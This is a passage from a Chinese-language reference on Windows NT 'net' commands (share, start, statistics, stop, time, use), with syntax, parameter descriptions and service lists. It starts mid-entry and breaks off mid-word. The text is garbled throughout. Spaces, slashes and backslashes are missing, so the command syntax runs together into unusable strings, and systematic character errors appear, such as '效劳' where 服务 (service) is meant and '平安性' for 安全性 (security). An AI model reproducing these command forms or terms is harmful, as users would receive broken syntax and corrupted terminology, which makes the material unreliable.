rename=drivepath[usersnumberunlimited][remarktext]netsharesharename[usersnumberunlimited][remarktext]netshare{sharenamedrivepath}delete参数无键入不带参数的netshare将显示本地计算机上所有共享资源的信息。sharename是共享资源的网络名称。键入带sharename的netshare命令，只显示该共享信息。drivepath指定共享目录的绝对路径。usersnumber设置可同时访问共享资源的最大用户数。unlimited不限制同时访问共享资源的用户数。remarktext添加关于资源的注释，注释文字用引号引住。delete停止共享资源。NetStart启动效劳，或显示已启动效劳的列表。如果效劳名是两个或两个以上的词，如NetLogon或ComputerBrowser，那么必须用引号()引住。.netstart[service]参数无键入不带参数的netstart那么显示运行效劳的列表。service包括以下效劳：alerter、clientservicefornetware、clipbookserver、computerbrowser、dhcpclient、directoryreplicator、eventlog、ftppublishingservice、lpdsvc、messenger、netlogon、networkdde、networkddedsdm、networkmonitoringagent、ntlmsecuritysupportprovider、ole、remoteaccessconnectionmanager、remoteaccessisnsapservice、remoteaccessserver、remoteprocedurecall(rpc)locator、remoteprocedurecall(rpc)service、schedule、server、simpletcpipservices、snmp、spooler、tcpipnetbioshelper、ups及workstation。以下效劳仅在WindowsNTServer下可用：fileserverformacintosh、gatewayservicefornetware、microsoftdhcpserver、printserverformacintosh、remoteboot、windowsinternetnameservice。NetStatistics显示本地工作站或效劳器效劳的统计记录。netstatistics[workstationserver]参数无键入不带参数的netstatistics将列出其统计信息可用的运行效劳。workstation显示本地工作站效劳的统计信息。server显示本地效劳器效劳的统计信息。NetStop停止WindowsNT网络效劳。netstopservice参数service包括以下效劳：alerter〔警报〕、clientservicefornetware〔Netware客户端效劳〕、clipbookserver〔剪贴簿效劳器〕、computerbrowser〔计算机浏览器〕、directoryreplicator〔目录复制器〕、ftppublishingservice(ftp)〔ftp发行效劳〕、lpdsvc、messenger〔信使〕、netlogon〔网络登录〕、networkdde〔网络dde〕、networkddedsdm〔网络ddedsdm〕、networkmonitoragent〔网络监控代理〕、ntlmsecuritysupportprovider〔NTLM平安性支持提供〕、ole〔对象链接与嵌入〕、remoteaccessconnectionmanager〔远程访问连接管理器〕、remoteaccessisnsapservice〔远程访问isnsap效劳〕、remoteaccessserver〔远程访问效劳器〕、remoteprocedurecall(rpc)locator〔远程过程调用定位器〕、remoteprocedurecall(rpc)service〔远程过程调用效劳〕、schedule〔调度〕、server〔效劳器〕、simpletcpipservices〔简单TCPIP效劳〕、snmp、spooler〔后台打印程序〕、tcpipnetbioshelper〔TCPIPNETBIOS辅助工具〕、ups及workstation〔工作站〕。以下效劳仅在WindowsNTServer中可用：fileserverformacintosh、gatewayservicefornetware、microsoftdhcpserver、printserverformacintosh、remoteboot、windowsinternetnameservice。NetTime使计算机的时钟与另一台计算机或域的时间同步。不带set参数使用时，将显示另一台计算机或域的时间。nettime[computernamedomain[name]][set]参数computername要检查或同步的效劳器名。domain[name]指定要与其时间同步的域。set使本计算机时钟与指定计算机或域的时钟同步。NetUse连接计算机或断开计算机与共享资源的连接，或显示计算机的连接信息。该命令也控制永久网络连接。netuse[devicename][computernamesharename[volume]][password]][user[domainname]username][[delete][persistent{yesno}]]netusedevicename[home[password]][delete{yesno}]netuse[persistent{yesno}]参数无键入不带参数的netuse将列出网络连接。devicename指定要连接到的资源名称或要断开的设备名称。有两类设备名：磁盘驱动器〔D到Z〕和打印机〔LPT1到LPT3〕。假设键入星号而不是指定设备名将分配下一个可用设备名。computern